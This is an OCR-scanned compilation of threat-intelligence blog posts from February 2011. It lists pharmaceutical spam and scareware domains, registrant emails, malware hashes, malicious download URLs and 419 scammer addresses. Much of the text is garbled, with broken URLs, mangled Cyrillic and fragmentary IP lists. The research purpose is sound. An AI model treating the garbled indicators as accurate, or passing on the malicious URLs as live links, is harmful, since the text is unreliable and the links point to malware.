http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.htm 
ttp://ddanchev. blogspot .com/2010/03/keeping-money-mule-recruiters-on-short.htm 
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9. http: //ddanchev . blogspot . com/2010/03/money-mule-recruiters-on-yahoos-web. html 
10. http: //ddanchev. blogspot .com/2010/02/dissect ing-ongoing-money-mule .htm 


. http://ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 


14, 

. http://ddanchev. blogspot .com/2009/05/inside-money-1laundering- groups- spamming. html 
16. 
17. 

18, 
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Whatever the cybercrime marketplace demands, the cybercrime marketplace supplies. 
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7.2.2 Spamvertised Portfolio of Fraudulent/Pharmaceutical 


(2011-02-14 20:14) 
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Domains 


Just in time for Saint Valentin’s days, pharmaceutical scammers have switched their localized 


templates to a more romantic theme. 


The domains have been registered using three separate Yahoo! 


Mail accounts, and are 


all responding to a single IP - 115.239.229.196; AS4134, CHINA-TELECOM China Telecom 
with four currently active [1]ZeuS C &Cs within the same AS - aiyanxinxi.com; wawnet.net; 


www.zuihouyi.com; nascetur.com. 


abpillsw.ru - Email: nikitapetuhov@yahoo.com 
alpillsw.ru - Email: nikitapetuhov@yahoo.com 
alypillsw.ru - Email: nikitapetuhov@yahoo.com 
annpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
asapillsm.ru - Email: alexeycheremisinov@yahoo.com 
barpillsw.ru - Email: nikitapetuhov@yahoo.com 
bazpillso.ru - Email: muzalevskayaekaterina@yahoo.com 
bupillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
capillso.ru - Email: muzalevskayaekaterina@yahoo.com 
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carpillsw.ru - Email: nikitapetuhov@yahoo.com 
celpillsw.ru - Email: nikitapetuhov@yahoo.com 
chapillsm.ru - Email: alexeycheremisinov@yahoo 
chapillso.ru - Email: muzalevskayaekaterina@yahoo.com 
chpillso.ru - Email: muzalevskayaekaterina@yahoo.com 
cinpillsp.ru - Email: nikitapetuhov@yahoo.com 
conpillsw.ru - Email: alexeycheremisinov@yahoo.com 
copillsm.ru - Email: alexeycheremisinov@yahoo.com 
copillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
corpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
crpillsm.ru - Email: alexeycheremisinov@yahoo.com 
depillsm.ru - Email: alexeycheremisinov@yahoo.com 
depillso.ru - Email: muzalevskayaekaterina@yahoo.com 
despillsw.ru - Email: nikitapetuhov@yahoo,cim 
dipillsm.ru - Email: alexeycheremisinov@yahoo.com 
dipillsw.ru - Email: nikitapetuhov@yahoo.com 
duppillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
enkpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
estpillsm.ru - Email: alexeycheremisinov@yahoo.com 
ethpillsm.ru - Email: alexeycheremisinov@yahoo.com 
exapillsw.ru - Email: nikitapetuhov@yahoo.com 
flipillso.ru - Email: alexeycheremisinov@yahoo.com 
flpillso.ru - Email: alexeycheremisinov@yahoo.com 
funpills.ru - Email: muzalevskayaekaterina@yahoo.com 
gipillso.ru - Email: alexeycheremisinov@yahoo.com 
haupillso.ru - Email: alexeycheremisinov@yahoo.com 
hipills.ru - Email: muzalevskayaekaterina@yahoo.com 
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invpillso.ru - Email: alexeycheremisinov@yahoo.com 
isapillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
itepillsw.ru - Email: nikitapetuhov@yahoo.com 
jopillso.ru - Email: alexeycheremisinov@yahoo.com 
kipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
kipillsw.ru - Email: nikitapetuhov@yahoo.com 
krpillsw.ru - Email: nikitapetuhov@yahoo.com 
lopillso.ru - Email: alexeycheremisinov@yahoo.com 
lopillsw.ru - Email: nikitapetuhov@yahoo.com 
mapillso.ru - Email: alexeycheremisinov@yahoo.com 
marpillsw.ru - Email: nikitapetuhov@yahoo.com 
metpillso.ru - Email: alexeycheremisinov@yahoo.com 
monpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
nopillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
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odpillsw.ru - Email: nikitapetuhov@yahoo.com 
panpillsw.ru - Email: nikitapetuhov@yahoo.com 
phpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsbi.ru - Email: simakovs@yahoo.com 

pillsly.ru - Email: alexeycheremisinov@yahoo.com 
pillsnk.ru - Email: alexeycheremisinov@yahoo.com 
pillsoep.ru - Email: alexeycheremisinov@yahoo.com 
pillsoes.ru - Email: alexeycheremisinov@yahoo.com 
pillsoff.ru - Email: alexeycheremisinov@yahoo.com 
pillsogn.ru - Email: alexeycheremisinov@yahoo.com 
pillsois.ru - Email: alexeycheremisinov@yahoo.com 
pillsoke.ru - Email: alexeycheremisinov@yahoo.com 
pillsokt.ru - Email: alexeycheremisinov@yahoo.com 
pillsong.ru - Email: alexeycheremisinov@yahoo.com 
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pillsont.ru - Email: alexeycheremisinov@yahoo.com 
pillsooc.ru - Email: alexeycheremisinov@yahoo.com 
pillsopa.ru - Email: alexeycheremisinov@yahoo.com 
pillsore.ru - Email: alexeycheremisinov@yahoo.com 
pillsosa.ru - Email: alexeycheremisinov@yahoo.com 
pillsosl.ru - Email: alexeycheremisinov@yahoo.com 

pillsoti.ru - Email: alexeycheremisinov@yahoo.com 

pillsouc.ru - Email: alexeycheremisinov@yahoo.com 
pillsove.ru - Email: alexeycheremisinov@yahoo.com 
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pillspba.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsper.ru - Email: muzalevskayaekaterina@yahoo.com 

pillspiz.ru - Email: muzalevskayaekaterina@yahoo.com 

pillspnc.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspne.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspno.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspns.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppt.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspra.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspre.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsprg.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspsa.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspss.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspst.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspti.ru - Email: muzalevskayaekaterina@yahoo.com 

pillsqu.ru - Email: alexeycheremisinov@yahoo.com 


pillswal.ru - Email: nikitapetuhov@yahoo.com 
pillswam.ru - Email: nikitapetuhov@yahoo.com 
pillswar.ru - Email: nikitapetuhov@yahoo.com 
pillswau.ru - Email: nikitapetuhov@yahoo.com 
pillswcu.ru - Email: nikitapetuhov@yahoo.com 
pillswed.ru - Email: nikitapetuhov@yahoo.com 
pillswep.ru - Email: nikitapetuhov@yahoo.com 
pillswerru - Email: nikitapbetuhov@yahoo.com 
pillswet.ru - Email: nikitapetuhov@yahoo.com 
pillswey.ru - Email: nikitapetuhov@yahoo.com 
pillswis.ru - Email: nikitapetunov@yahoo.com 
pillswng.ru - Email: nikitapetuhov@yahoo.com 
pillswol.ru - Email: nikitapetuhov@yahoo.com 


See also: 


¢ [2]Inside an affiliate spam program for pharmaceuticals 
¢ [3]Survey: Millions of users open spam emails, click on links 


¢ [4]Microsoft’s Bing invaded by pharmaceutical scammers 


pillswre.ru - Email: nikitapetuhov@yahoo.com 
pillswss.ru - Email: nikitapetuhov@yahoo.com 

pillswti.ru - Email: nikitapetuhov@yahoo.com 

pillswtt.ru - Email: nikitapetuhov@yahoo.com 
pillswwa.ru - Email: nikitapetuhov@yahoo.com 
pillszva.ru - Email: nikitapetuhov@yahoo.com 

pillszzi.ru - Email: nikitapetuhov@yahoo.com 
propillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
puppillso.ru - Email: alexeycheremisinov@yahoo.com 
rempillso.ru - Email: alexeycheremisinov@yahoo.com 
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repillso.ru - Email: alexeycheremisinov@yahoo.com 
sipillsw.ru - Email: nikitapetuhov@yahoo.com 
stapillso.ru - Email: alexeycheremisinov@yahoo.com 
supillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
tilpillso.ru - Email: alexeycheremisinov@yahoo.com 
tilpillsw.ru - Email: nikitapetuhov@yahoo.com 
towpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
trpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
uncpillso.ru - Email: alexeycheremisinov@yahoo.com 
vipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
whapillsw.ru - Email: nikitapetuhov@yahoo.com 


51. alemedicp.ru 
bacdns.ru 
bacmedicp.ru 
camdns.ru 
delmedicy.ru 


$1.elmendns.ru 
$1.gurndns.ru 
.sighost.ru 
twdoctor.com 
yodoctorx.ru 
advidns.ru 
51. bestworlddns.com 
s.r 


comtdns.com 
.crouadns Pu 
culldns.com 


$1.subrdns.ru 


tiodns.com 


Name servers of notice, respoding to 115.239.229.196 (AS41134); 113.23.142.119 
(AS38182) and 78.46.105.205 (AS24940 - active [5]SpyEye C &Cs at www.privathosting.eu; 
spl.privathosting.eu) 
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ns1l.advidns.ru 
nsl.alemedicp.ru 
nsl.annudns.com 
nsl1.bacdns.ru 
ns1.bacmedicp.ru 
ns1.bestworlddns.com 
ns1.botedns.com 
ns1.boxdns.ru 
nsl.camdns.ru 
nsl.cashdns.ru 
nsl.caulsdns.com 
nsl.comtdns.com 
nsl1.crouadns.ru 
nsl.culldns.com 
nsl1.delmedicv.ru 
nsl.dns4work.ru 
nsl1.dnsbest.ru 
ns1.dnsbestfind.com 
ns1.dnsoper.com 
nsl1.dnsorbi.com 
ns1.dnsroomo.ru 
nsl.dnswork.ru 
ns1.doctorci.ru 
nsl.doctorngee.ru 
nsl.doctorrfix.com 
ns1.doctorude.ru 
nsl1.doctorxst.ru 
ns1.doctorxve.ru 
nsl1.drdoctorx.ru 
nsl.dromedicp.ru 
nsl.eagreadns.ru 
nsl1.elmendns.ru 
ns1.feldns.ru 
ns1.glisdns.com 
nsl.gurndns.ru 
nsl.hardns.ru 
ns1.psidns.com 
ns1.rxshopsmor.ru 
ns1.sighost.ru 
nsl1.standns.com 
nsl1.subrdns.ru 
ns1.tiodns.com 
ns1.twdoctor.com 
ns1.vodoctorx.ru 


This post has been reproduced from [6]Dancho Danchev's blog. 


1. https://zeustracker.abuse.ch/monitor .php?as=4134 


ttp://www.zdnet .com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054 


4. http://www.zdnet .com/blog/security/microsofts-bing-invaded-by-pharmaceutical-scammers/399 


5. https://spyeyetracker.abuse.ch/monitor.php?as=24940 
6. http://ddanchev.blogspot.com/ 


7.2.3 A Diverse Portfolio of Fake Security Software - Part Twenty Five 
(2011-02-15 16:06) 


Potential threat details 


Microsoft Security Essentials detected potential threats that might compromise your privacy or damage your 
computer. Your access to these items may be suspended until you take an action, Click ‘Show details’ to learn 


more, 
Detected items 4lert level Recommendation Status 
© Unknown Win32/Trojan Severe Remove Suspended 


Category: Trojan 
Description: This program is dangerous and execute commands from an attacker. 


Recommendation: Remove this software immediately. 


Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. 
You can still access the files that these programs use without removing them (not recommended), To access 
these files, select the 'Clean computer’ action and click ‘Apply action’. IF this option is not available, 

log on as administrator or ask the local administrator for help. 


Items: 
c:\program files\winamp\winamp.exe 


Clean computer | Apply actions | Close | 


Scarewere continues occupying the top spots for malicious monetization tactics courtesy of 
the cybercrime ecosystem. Disruption of this monetization chain can take place through 
multiple processes. For instance: 


¢ Share data with the affected ISP whose customers participate in the black hat SEO cam- 
paign 


Target the payment processing gateways, or inform the legitimate one 


Target the the redirector URLs of the campaign 


Target the affiliate network itself 
3635 


¢ Target the "final output" in the form of scareware domains 


In this we’ll expose a portfolio of scaware domains, and will target the "final output" of the 
Campaign, in between sharing data with community members. As always, what originally 
looks like a low profile campaign, always turns into a piece of puzzle from the massive blackhat 
SEO "picture". 


- Detecrion rate for systemwrecksavertingsystem.com /scan1/92/freesystemscan.exe 
[1]freesystemscan.exe - Trojan.Win32.FakeAV 

Result: 17/ 43 (39.5 %) 

MD5 : a69a/f1992ed4607ac0al63d66984f56 

SHA1 : ef089f92881ff6835b76562febdcbc3328340adb 

SHA256: 993026853e2bbc8846dbda5a90c4f06a9al8b83c9f97fe7b1557b03975ebeaff 


- Detection rate for pornhugevideo.com /video3/88/freevideoplugin.exe 
[2]freevideoplugin.exe - Rogue:Win32/FakePAV 

Result: 4/ 42 (9.5 %) 

MDS5 : 8a688d6ebb838f66f16720f4066cf6c6 

SHA1 : 845e43ad946048346b3d9150ae41fd8f7 766ac53 

SHA256: db6e3e7a72305d8b36861ed90753555d519bdca5a36aa0581ed363ac264cfbce 
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tem.com 
system ertingsystem.com 
pornhugevideo.com 


tubemovievideo,com 
accidentspreventingcenter.com 
systemsupervisioncenter.com 


center.com 
om 


solver.com 


pcprotectionservant.com 

www. pcprotectionseryant.com 

systemshieldingutility com 

pecustodianutility.com 

pcinspectionutility.com 
emattentionutility.com 


Responding to 94.23.105.248 (AS16276): One active [3]ZeuS C &C within the AS monasteri- 
odeboltana.es 

accidentspreventingcenter.com - Email: contact@privacyprotect.org 
antibreakingsystem.com - Email: contact@privacyprotect.org 
antivirusesshield.com - Email: contact@privacyprotect.org 
bigvideocams.com - Email: contact@privacyprotect.org 
componentsprotector.com - Email: contact@privacyprotect.org 
hugebigpornmovie.com - Email: contact@privacyprotect.org 
hugebigred.com - Email: contact@privacyprotect.org 
hugemoviecams.com - Email: contact@privacyprotect.org 
pcactivitydebugger.com - Email: contact@privacyprotect.org 
pcautomaticproblemssolver.com - Email: contact@privacyprotect.org 
pccustodianutility.com - Email: contact@privacyprotect.org 
pcinspectionutility.com - Email: contact@privacyprotect.org 
pcprecautionscenter.com - Email: contact@privacyprotect.org 
pcprotectionservant.com - Email: contact@privacyprotect.org 
pcriskspreventionscenter.com - Email: contact@privacyprotect.org 
pcstabilitymaximizer.com - Email: contact@privacyprotect.org 
pctroublessolver.com - Email: contact@privacyprotect.org 
pcwardingsystem.com - Email: contact@privacyprotect.org 
pornhugevideo.com - Email: contact@privacyprotect.org 
systemanticrashesutility.com - Email: contact@privacyprotect.org 
systemattentionutility.com - Email: contact@privacyprotect.org 


3637 


systemshieldingutility.com - Email: contact@privacyprotect.org 
systemsupervisioncenter.com - Email: contact@privacyprotect.org 
systemtasksoptimizer.com - Email: contact@privacyprotect.org 
systemwrecksavertingsystem.com - Email: contact@privacyprotect.org 
taskstweakingutility.com - Email: contact@privacyprotect.org 
tubemovievideo.com - Email: contact@privacyprotect.org 


7.101 

7.101 

117,101 

7.101 

117,101 

7,101 

eh.co.ce 117,101 
6dnfgdn.co.ce 6.117.101 
117,101 

5.117.101 

5,117,101 

maridora, f 76.76,117,101 
bFbF3bFb, 76.76,117,101 
76,117,101 

bdfnfebne3nf c 5.76.117,101 
hndfdfnfdnxd c 76,76,117,101 
wefge3qitgl 117,101 
76,.76,117,101 

76,.76,117,101 

76.76,117,101 

76,117,101 
6.117.101 
oO ire tip 
6.117.101 
6,117,101 
5.117.101 
117,101 
7.101 
117,101 
7.101 
76,117,101 


an on 


non 


a 


wi wv WS WS ow 
a 


on 


Responding to 76.76.117.101 (AS21793); 78.46.105.205 (AS24940); 207.58.177.96 (AS25847) 
and 64.64.3.125 (AS25847) 

212156dnfgdn.co.cc - Email: audiodius@hotmail.com 

32fdsg3gsg.vv.cc 

androlhala.cz.cc 

bdfnfebne3nf.vv.cc 

bfbf3bfb.vv.cc 

cebandis.cz.cc 

centrihelm.cz.cc 
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drelagda.vv.cc 

f23f21fafae.vv.cc 

fdf2fafaf.vv.cc 

gdezdeskto.co.cc 

gdsg342gsgs.vv.cc 

gewhehehd4.co.cc - Email: audiodius@hotmail.com 
gfsdg4gs.co.cc - Email: audiodius@hotmail.com 
graninis.cz.cc 

gsdg24gshgr.vv.cc 

gsdg43hsweh.co.cc - Email: audiodius@hotmail.com 
gsegf3gstg3g.vv.cc 

gsg3gsdgseg.co.cc - Email: audiodius@hotmail.com 
gsgsv2vds.vv.cc 

gsgwegweg23g.vv.cc 

hdfg43hshf.co.cc - Email: audiodius@hotmail.com 
hdfh34hdrfhf.co.cc - Email: audiodius@hotmail.com 
hdhfdhdfhdfhdfh.vv.cc 

hfehe3hdfhf.co.cc - Email: audiodius@hotmail.com 
hh3hfdnfdh.co.cc - Email: audiodius@hotmail.com 
hndfdfnfdnxdnf.vv.cc 

ht4hdfgjcjgt.vv.cc 

hu587tiugi.vv.cc 

malakelv.cz.cc 

maridora.vv.cc 

morlunaya.vv.cc 

nvmtymvm.vv.cc 

oghmalak.vv.cc 

oijqujnnnsul.co.cc - Email: audiodius@hotmail.com 
shalillador.cz.cc 

vsegwgewg.Vv.cc 

wefge3gl1tglg.vv.cc 

yeryeshsdhdhijfdhj.vv.cc 


This post has been reproduced from [4]Dancho Danchev'’s blog. 


Related posts on scareware and blackhat SEO monetization: 

[5]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[6]Dissecting a Scareware-Serving Black Hat SEO Campaign Using Compromised .NL/.CH Sites 
[7]Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign 

[8]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - Part Two 
[9]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[10]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 

[11]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 

[12]The ultimate guide to scareware protection 

[13]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[14]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[15]A Peek Inside the Managed Blackhat SEO Ecosystem 

[16]Dissecting a Swine Flu Black SEO Campaign 

[17]Massive Blackhat SEO Campaign Serving Scareware 

[18]From Ukrainian Blackhat SEO Gang With Love 
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[19]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[20]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[21]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 

[22]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


[23]The Ultimate Guide to Scareware Protection 

[24]A Diverse Portfolio of Fake Security Software - Part Twenty Four 
[25]A Diverse Portfolio of Fake Security Software - Part Twenty Three 
[26]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[27]A Diverse Portfolio of Fake Security Software - Part Twenty One 
[28]A Diverse Portfolio of Fake Security Software - Part Twenty 
[29]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[30]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[31]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[32]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[33]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[34]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[35]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[36]A Diverse Portfolio of Fake Security Software - Part Twelve 
[37]A Diverse Portfolio of Fake Security Software - Part Eleven 
[38]A Diverse Portfolio of Fake Security Software - Part Ten 

[39]A Diverse Portfolio of Fake Security Software - Part Nine 

[40]A Diverse Portfolio of Fake Security Software - Part Eight 

[41]A Diverse Portfolio of Fake Security Software - Part Seven 
[42]A Diverse Portfolio of Fake Security Software - Part Six 

[43]A Diverse Portfolio of Fake Security Software - Part Five 

[44]A Diverse Portfolio of Fake Security Software - Part Four 

[45]A Diverse Portfolio of Fake Security Software - Part Three 
[46]A Diverse Portfolio of Fake Security Software - Part Two 
[47]Diverse Portfolio of Fake Security Software 


1. ttp://www.virustotal.com/file-scan/report.htm1?id=993026853e2bbc8846dbdaba90c4f 06a9a18b83c9f97£e7b1557b0 


2 
5 
‘ 

5 
6. 
1 

8. : : : i ing- 
9. : : - 


10. 
1, 


. http: //www.zdnet.com/blog/security/the-ultimate-guide-to-scareware-protection/429 


13. http://ddanchev.blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat .htm 
14. http: //ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.htm 
. http: //ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.htm 


. http: //ddanchev. blogspot. com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 


17. http://ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving.htm 


ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 


ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


20. http: //ddanchev. blogspot . com/2009/06/from-ukraine-with-scareware-serving.htm 
21. http://ddanchev. blogspot . com/2009/07/from-ukraine-with-bogus-twitter.htm 


ttp://ddanchev. blogspot .com/2009/06/fake-web-hosting-provider-front-end-to.htm 


23. http://blogs.zdnet.com/security/?p=429 
24. http://ddanchev. blogspot .com/2009/12/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security_27.htm 


26. http://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security.htm 
27. http://ddanchev. blogspot .com/2009/06/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/05/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.htm 


30. http://ddanchev. blogspot . com/2009/04/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/03/diverse-portfolio-of-fake-security_31.htm 


32. http://ddanchev. blogspot . com/2009/03/diverse-portfolio-of-fake-security.htm 
. http://ddanchev. blogspot . com/2009/02/diverse-portfolio-of-fake-security.htm 
. http://ddanchev. blogspot .com/2009/01/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.htm 


Ww Ww 
& WwW 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


46. http://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
47. http: //ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
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7.2.4 Bogus Adult Content SPIM-ed Over ICQ (2011-02-16 13:25) 


Katanor 


B kaTanore npegcragnexb! BCe DeBYWKH, 2aperncTPMPOBaHHbIe B BNAeo-vaTe. Ech NOMPaBMBWeHCA BaM ACBYWKH HET B P@XKMME «OH-NaliMe, Be 


MOKeTe SaiiTH K He B SHKETY M NOCMOTpeTb ee pacnucaHKHe. 


Nonck 


OTEHOKS? xVpSex 


See SnVaAes 


BecnnatHeil var Mnaree var 


Hangenni 8123 mogenn: 


SEXYALIS WowFactor lrus 


- aa 


NAaTHEI “aT BecnnarHeiit wat 


Sexylesica Nasty4pRy Mapuwal 


A currently SPIM-ed campaign over ICQ attempts to trick the end user into becoming a member 
of a bogus adult content offering network, which drives sales through spamming. 


The links chain: 
- ow.ly/3V9eu 


- art-spectrum.info/load2/7674/foto.jar - 178.170.250.12 (AS52000, ALDAN-3-AS LTD "ALDAN- 


3) 


- video-girl.tv/default.aspx - 81.177.3.250 - Email: 


RTCOMM-AS OJSC RTComm.RU) 


support@video-people.com (AS8342, 
with two active [1]SpyEye C &Cs within the AS 


googlemaps4.com (81.176.236.177) and reg.kygalu.ru - 81.177.32.45 - Email: kygalu.ru@r01- 


service.ru 


- Responding to 178.170.250.12 are also geoinvest.org (178.170.250.12) Email: 


vest@sum.co.ru and power-man.ru (178.170.250.12) Email: antonvp@yandex.ru 
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geoin- 


4& GEOINVEST 


SSR LIMITED LIABILITY COMPANY 


cn 
) POR 


7 ae 
oe 


: 
| 
: 
| 
| 

; 


- Responding to 81.177.3.250 are: 
vchat.kladoffka.com - Email: sanny _dbroker@mail.ru 
virtualniyseks.in - Email: sereg@hot.ee 
odetih.net - Email: reg@legato.name 
pornoton.net 

russiansgirls.net 

videodevki.ru - Email: prezidentbush@yandex.ru 
video-girl.ru - Email: admin@video-girl.ru 
strip-girl.ru - Email: kinoman-cd@yandex.ru 
webcam-girls.ru - Email: srg surgut@pisem.net 
videoshowsgirls.ru - Email: gogcnbr@i.ua 
sexy-chat.ru - Email: roman.alexsandr@mail.ru 
flirtshow.ru - Email: rusproject99@yandex.ru 
chatsexy.ru - Email: roman.alexsandr@mail.ru 
rusprivate.su - Email: sadko-as@rambler.ru 
video-girl.tv - Email: support@video-people.com 
x-chat.tv - Email: x-chat@mail.ru 


This post has been reproduced from [2]Dancho Danchev’s blog. 


1. https: //spyeyetracker.abuse.ch/monitor . php?as=8342 
2. http: //ddanchev.blogspot.com/ 
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7.2.5 Sampling 419 Advance Fee Scams Activity - Part Two (2011-02-21 13:54) 


Part two of the [1]Sampling 419 Advance Fee Scams Activity series, once again aims to 
provide actionable real-time threat intelligence on a fraudulent segment that continues 
tricking hundreds of thousands of average Internet users into thinking that they have pending 
payments, have won the lottery, or someone is basically interested in doing multi-million 


dollar business with them. 


The format of the data obtained over the past 24 hours, is return email plus the original 


2479 MALS f 

2 SPAM EMAILS (67 

eoematl ExTRAt : 
are NOT ALLO) 


|e 4719 MAILS 

| @ SPAM E-n1AILS 

| @ E-MAIL EXTRACTORS 
are NOT ALLOWED 


| 

ane eae We 

| -pepens tangas i 
er ee cpoee Ronen? RE 


IP of the sender, most of which can be geolocated to African countries. 


hsuehyun@ncut.edu.tw - 116.206.139.254 
peterjohnson299@yahoo.co.jp - 41.218.232.158 
ekwesa@aol.com - 41.138.164.52 


info.bhsbcbanktransfer@gmail.com - 41.218.251.239 


SarinaJensB@web.de - 77.70.128.160 
paulmohammed37@yahoo.com - 41.155.81.129 
henriondaniellepaulette@yahoo.fr - 81.91.228.78 
mainstreamfirm001@gmail.com - 41.155.72.26 
wilson201105@hotmail.com - 187.16.224.70 
westernun888union@hotmail.com - 41.191.85.209 
bt.telecomsgroup@live.co.uk - 202.137.234.123 
eco.bankplc.ecobankpl@gmail.com - 41.216.50.26 
kwameowus@aol.com - 41.218.233.50 
richardjsphs@yahoo.co.jp - 190.213.185.93 
mainstreamfirm001@gmail.com - 212.76.68.39 
benardodigor@yahoo.com - 41.211.229.23 
groupbanofafrica@hotmail.com - 189.86.87.204 
wellcometrustloans@post.com - 182.63.1.192 
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lindominic04@rediffmail.com - 41.28.113.153 

rep _leonbecker@yahoo.cn - 41.218.197.240 

agwa _james@yahoo.it - 82.128.1.217 
mrsmarriogloria@yahoo.co.jp - 41.66.8.132 
ralphkoon@yahoo.co.jp - 124.120.130.145 
directorofremittance.centralba@gmail.com - 89.221.175.11 
legalclaimsdepartment2@lankaemail.com - 41.58.67.161 
drbbs@live.com - 111.172.36.231 
pn2812768@gmail.com - 77.246.67.82 
husainali40Q@gmail.com - 212.52.152.113 
bensonibori@yahoo.com.hk - 82.128.36.25 
mraabull@att.net - 41.210.43.36 
info@westernu.co.uk - 199.255.209.74 

claim _dptupdate@live.com - 82.128.88.173 
alhussein.raisin@yahoo.co.nz - 86.97.120.18 
adrianyrann5@att.net - 70.39.119.122 

dr_larry west1970@qatar.io - 41.222.192.89 
mrgarypalmercode@gmail.com - 41.71.147.248 
diplomaticericb78@globomail.com - 81.91.230.137 
treasuryoffice@cantv.net - 41.0.52.62 
infounl9@oued.org - 41.189.2.105 

foi 54327@hotmail.com - 82.128.109.76 
s.b.mail@web.de - 74.115.3.69 
maria200495@hotmail.com - 115.132.173.171 
ceckamokai@gmail.com - 41.241.148.81 
ff123ff69@yahoo.co.nz - 75.126.137.6 
mr.colesify@yahoo.co.uk - 115.118.239.95 
benkofi003@aol.com - 41.218.239.140 
investigationcommite2011@gmail.com - 41.211.229.26 
wiesner.heiko@web.de - 41.138.167.198 
kwameowus@aol.com - 41.218.245.220 
kamaruddinabdullah@w.cn - 120.141.67.94 
benobiego@rediffmail.com - 67.247.201.204 


See also: 


¢ [2]419 scammers using Dilbert.com 
¢ [3]419 scammers using NYTimes.com ‘email this feature 


¢ [4]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns 


Historical OSINT remains an inseparable part of the CYBERINT gathering practices, hence the 
continuation of the Sampling 419 Advance Fee Scams Activity series. 


This post has been reproduced from [5]Dancho Danchev’s blog. Follow him 
[6Jon Twitter. 


1. http: //ddanchev. blogspot .com/2010/06/sampling-419-advance-fee-scams-activity.htm 


2. http: //www.zdnet.com/blog/security/419-scammers-using-dilbertcom/3809 
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3. http://www. zdnet .com/blog/security/419-scammers-using-nytimescom-email-this-feature/3491 


4. http://www.zdnet .com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-camp 


aigns/6610 
5. http: //ddanchev. blogspot .com/ 
6. http://twitter .com/danchodanche 


7.2.6 Summarizing Zero Day’s Posts for February (2011-02-28 15:59) 


[1] 


Zero Day 


Dynamische infrastruktur gesucht? 
" Jetzt (BM Treoli-Softesrelosunges 

ZDNet Must Read Md homkurrersfahig bleiben 
Pwn20Own 2011: Google offering $20K for Chrome sandbox exploit 
Google is offering a $20,000 cash prize for any hacker who can successfully comeromese a Cr-48 
Chrome Notebook ia a vulverabaty 


Sad More 


avd sandbox es 1 its Chrome web browser 


cape 


Blogger Info Researchers spot new Mac OS X malware 


Syan Narasee The best of ZDNet, delivered 
ahaa! Securty researchers from Sophos have spotted a mew piece of matware 


Dasche Danchev targeting Mac OS X users. 


